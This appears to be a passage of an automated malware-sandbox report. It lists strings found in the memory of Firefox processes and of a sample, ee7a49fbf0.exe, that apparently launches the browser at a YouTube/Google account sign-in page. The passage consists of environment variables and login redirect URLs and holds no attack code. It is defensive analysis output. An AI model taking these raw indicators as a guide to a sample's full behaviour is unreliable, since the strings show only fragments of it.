Source: firefox.exe, 00000028.00000002.3295117428.00000221E2134000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCMOZ_CRASHREPORTER_DATA_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash ReportsMOZ_CRASHREPORTER_EVENTS_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes\eventsMOZ_CRASHREPORTER_PING_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Pending PingsMOZ_CRASHREPORTER_RESTART_ARG_0=C:\Program Files\Mozilla Firefox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/accountMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Firefox\browser\crashreporter-override.iniNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files\Mozilla Firefox;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows equals www.youtube.com (Youtube)
Source: firefox.exe, 0000002D.00000002.3292463596.0000022B01654000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCMOZ_CRASHREPORTER_DATA_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash ReportsMOZ_CRASHREPORTER_EVENTS_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes\eventsMOZ_CRASHREPORTER_PING_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Pending PingsMOZ_CRASHREPORTER_RESTART_ARG_0=C:\Program Files\Mozilla Firefox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/accountMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Firefox\browser\crashreporter-override.iniNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files\Mozilla Firefox;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windowsz[ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2790450714.00000291F3C50000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\Roamingb2eincfilepath=C:\Windows\system32chromePath=C:\Program Files\Google\Chrome\Application\chrome.exeCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataedgePath=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exefirefoxPath=C:\Program Files\Mozilla Firefox\firefox.exeFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsAppsPATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramFiles64=C:\Program FilesProgramFiles86=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSModulePath=%ProgramFiles(x86)%\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempURL=https://www.youtube.com/accountUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2773519559.00000291F3940000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Program Files\Mozilla Firefox\firefox.exehttps://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 00000020.00000002.2795766765.00000260EA7D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Program Files\Mozilla Firefox\firefox.exehttps://www.youtube.com/account--attempting-deelevation equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2773519559.00000291F3940000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Windows\system32\C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account"winsta0\default equals www.youtube.com (Youtube)
Source: firefox.exe, 00000020.00000002.2795766765.00000260EA7D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Windows\system32\C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account --attempting-deelevationC:\Program Files\Mozilla Firefox\firefox.exeWinsta0\Default equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000003.2737509112.00000291F395E000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2750122014.00000291F396F000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2773519559.00000291F3970000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Local\TempURL=https://www.youtube.com/accountUSERDOMAIN=user-PCS equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.2794491755.0000016DCE8D5000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.3282835116.00000221E1E3A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.3282835116.00000221E1E30000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: MOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.3282835116.00000221E1E3A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: MOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/account) equals www.youtube.com (Youtube)
Source: firefox.exe, 0000002D.00000002.3282362582.0000022B012E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: MOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/account\ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3164020017.0000016DE06D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: O^partitionKey=%28https%2Cgoogle.com%29,:https://accounts.google.com/InteractiveLogin?continue=https://www.youtube.com/signin?action_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&passive=true&service=youtube&uilel=3&ifkv=AdF4I74t81MIc57ZWbsnEHjOAL5XOxc5V6997UX_MR6Qs_U3Wxrin9CV5DYxb5Lh9RkCjVILOmyLbg equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3158551690.0000016DE97E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: O^partitionKey=%28https%2Cgoogle.com%29,:https://accounts.google.com/InteractiveLogin?continue=https://www.youtube.com/signin?action_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&passive=true&service=youtube&uilel=3&ifkv=AdF4I76O59q3kZuVkEikshcjAqxUN8FNn3aweiPynOeRPtNl-mQkf3AYfHIp2ju47tXoxYdAUO-i equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3164020017.0000016DE06D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: O^partitionKey=%28https%2Cgoogle.com%29,:https://accounts.google.com/ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3164020017.0000016DE06D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: O^partitionKey=%28https%2Cgoogle.com%29,:https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&ifkv=AdF4I74gVc5v2Cb6G5cvkcN8YiZOQIWdfcHUNib3P-Isq_4QdJyamQMDLmpjXPVV783jpnO9RSm_JA&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S-1155665976%3A1722017438793381&ddm=0 equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2773519559.00000291F3949000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2790450714.00000291F3C50000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: URL=https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2773519559.00000291F3949000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: URL=https://www.youtube.com/account9 equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3158551690.0000016DE97BE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000021.00000003.3158551690.0000016DE97BE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: `https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.2984375808.0000016DDF8CD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: about:certerror?e=nssBadCert&u=https%3A//www.youtube.com/account&c=UTF-8&d=%20 equals www.youtube.com (Youtube)
Source: load_statistics.db-wal.35.dr String found in binary or memory: accounts.google.comwww.youtube.com equals www.youtube.com (Youtube)
Source: load_statistics.db-wal.35.dr String found in binary or memory: accounts.google.comwww.youtube.com"- equals www.youtube.com (Youtube)
Source: WebAssistDatabase.35.dr String found in binary or memory: ahttps://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den-GB%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en-GB&ifkv=AdF4I74Ty1k4SceekYc-6if7fWi3AcAALn1pou-ox3lp9iTb0DdbPvF0pDppPqh7hSf65ZuMwb5J&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S473483422%3A1722017432215720&ddm=0YouTubeshare video friend family worldf equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2773519559.00000291F3949000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: dules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempURL=https://www.youtube.com/accountUSERDOMAIN=user equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.2984375808.0000016DDF8CD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: e=nssBadCert&u=https%3A//www.youtube.com/account&c=UTF-8&d=%20 equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3204676713.0000016DE9EA3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: h3realm=com.google&args=service%3Dyoutube%26continue%3Dhttps://www.youtube.com/signin?action_handle_signin%253Dtrue%2526app%253Ddesktop%2526hl%253Den%2526next%253Dhttps%25253A%25252F%25252Fwww.youtube.com%25252Faccount%2526feature%253Dredirect_login equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3164020017.0000016DE06D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/InteractiveLogin?continue=https://www.youtube.com/signin?action_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&passive=true&service=youtube&uilel=3&ifkv=AdF4I74t81MIc57ZWbsnEHjOAL5XOxc5V6997UX_MR6Qs_U3Wxrin9CV5DYxb5Lh9RkCjVILOmyLbg equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3158551690.0000016DE97E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/InteractiveLogin?continue=https://www.youtube.com/signin?action_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&passive=true&service=youtube&uilel=3&ifkv=AdF4I76O59q3kZuVkEikshcjAqxUN8FNn3aweiPynOeRPtNl-mQkf3AYfHIp2ju47tXoxYdAUO-i equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3164020017.0000016DE06D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3164020017.0000016DE06D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&ifkv=AdF4I74gVc5v2Cb6G5cvkcN8YiZOQIWdfcHUNib3P-Isq_4QdJyamQMDLmpjXPVV783jpnO9RSm_JA&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S-1155665976%3A1722017438793381&ddm=0 equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3223621375.0000016DEE3D3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&ifkv=AdF4I77EVwBCWklE9qIBneDMIiwFWCCFTErG2FyxHopmLBm9ld0zmag6hfnN6yKuG81xlYfRS6YoZQ&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S1379105066%3A1722017451321129&ddm=0 equals www.youtube.com (Youtube)
Source: WebAssistDatabase.35.dr String found in binary or memory: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den-GB%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en-GB&ifkv=AdF4I74Ty1k4SceekYc-6if7fWi3AcAALn1pou-ox3lp9iTb0DdbPvF0pDppPqh7hSf65ZuMwb5J&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S473483422%3A1722017432215720&ddm=0 equals www.youtube.com (Youtube)
Source: WebAssistDatabase.35.dr String found in binary or memory: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den-GB%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en-GB&ifkv=AdF4I74Ty1k4SceekYc-6if7fWi3AcAALn1pou-ox3lp9iTb0DdbPvF0pDppPqh7hSf65ZuMwb5J&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S473483422%3A1722017432215720&ddm=0YouTubeshare video friend family worldf equals www.youtube.com (Youtube)
Source: WebAssistDatabase.35.dr String found in binary or memory: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den-GB%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en-GB&ifkv=AdF4I75aNkmYhtF_MmgmHjGWmp0oL3UvNytgZNbpUtsHuVRyXxpuwTtrRtVZa0mplhYWnP6By8Z9Ww&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S-1357171065%3A1722017418669557&ddm=0YouTubeshare video friend family worldf equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3213385438.0000016DE66DD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3141974172.0000016DDE0A0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3160209289.0000016DE67A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000021.00000003.3128258779.0000016DDE270000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/favicons/facebook-com.icohttps://www.aliexpress.com/nimbus-desktop-experimentsimages/leboncoin-fr@2x.png_generateVariablesOnlySchemafavicons/leboncoin-fr.pngimages/aliexpress-com@2x.pngoptInToExperiment/branch<_validateBranches/schema<nimbus:enrollments-updated did not match due to targetingmain/nimbus-desktop-experiments equals www.facebook.com (Facebook)
Source: firefox.exe, 00000021.00000003.2986300787.0000016DDF285000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2970407421.0000016DDF285000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2883300923.0000016DDF28C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3213385438.0000016DE66DD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3141974172.0000016DDE0A0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3216728852.0000016DE496D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000002D.00000002.3283706595.0000022B01503000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000002D.00000002.3283706595.0000022B01503000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000002D.00000002.3283706595.0000022B01503000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3164020017.0000016DE06E1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3213385438.0000016DE66DD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2986300787.0000016DDF285000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: ee7a49fbf0.exe, 00000018.00000003.2729921737.0000000002517000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account" equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3164533070.0000016DDEAF8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https:www.youtube.com:443:www.youtube.com:443::n:1724609447:h3:y:1722017420:n:^partitionKey=%28https%2Cyoutube.com%29:|n:y: equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3206351859.0000016DE66CA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: location: https://accounts.google.com/ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en equals www.youtube.com (Youtube)
Source: WebAssistDatabase.35.dr String found in binary or memory: mhttps://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den-GB%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en-GB&ifkv=AdF4I75aNkmYhtF_MmgmHjGWmp0oL3UvNytgZNbpUtsHuVRyXxpuwTtrRtVZa0mplhYWnP6By8Z9Ww&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S-1357171065%3A1722017418669557&ddm=0YouTubeshare video friend family worldf equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.3295117428.00000221E2130000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: pData\Roaming\Mozilla\Firefox\Pending PingsMOZ_CRASHREPORTER_RESTART_ARG_0=C:\Program Files\Mozilla Firefox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/accountMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Fir equals www.youtube.com (Youtube)
Source: firefox.exe, 0000002D.00000002.3292463596.0000022B01650000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: pData\Roaming\Mozilla\Firefox\Pending PingsMOZ_CRASHREPORTER_RESTART_ARG_0=C:\Program Files\Mozilla Firefox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/accountMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla FirjZ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2773519559.00000291F3949000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: phttps://www.youtube.com/account --attempting-deelevation( equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3204676713.0000016DE9EA3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: realm=com.google&args=service%3Dyoutube%26continue%3Dhttps://www.youtube.com/signin?action_handle_signin%253Dtrue%2526app%253Ddesktop%2526hl%253Den%2526next%253Dhttps%25253A%25252F%25252Fwww.youtube.com%25252Faccount%2526feature%253Dredirect_login equals www.youtube.com (Youtube)
Source: ee7a49fbf0.exe, 00000018.00000003.2729921737.0000000002517000.00000004.00000020.00020000.00000000.sdmp, ee7a49fbf0.exe, 00000018.00000003.2730073719.0000000002330000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: set "URL=https://www.youtube.com/account" equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000003.2737509112.00000291F395E000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2750122014.00000291F396F000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2773519559.00000291F3970000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: utoItXPUBLIC=C:\Users\PublicSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempURL=https://www.youtube.com/accountUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSER{8 equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3160209289.0000016DE67CC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3221850152.0000016DE67CC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3215505857.0000016DE4B6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 00000021.00000003.3075146956.0000016DDD469000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2986300787.0000016DDF285000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2970407421.0000016DDF285000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3191939859.0000016DE9A24000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.youtube.com/account equals www.youtube.com (Youtube)
Source: load_statistics.db-wal.35.dr String found in binary or memory: www.youtube.com\ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3213385438.0000016DE66DD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.youtube.com^partitionKey=%28https%2Cyoutube.com%29 equals www.youtube.com (Youtube)
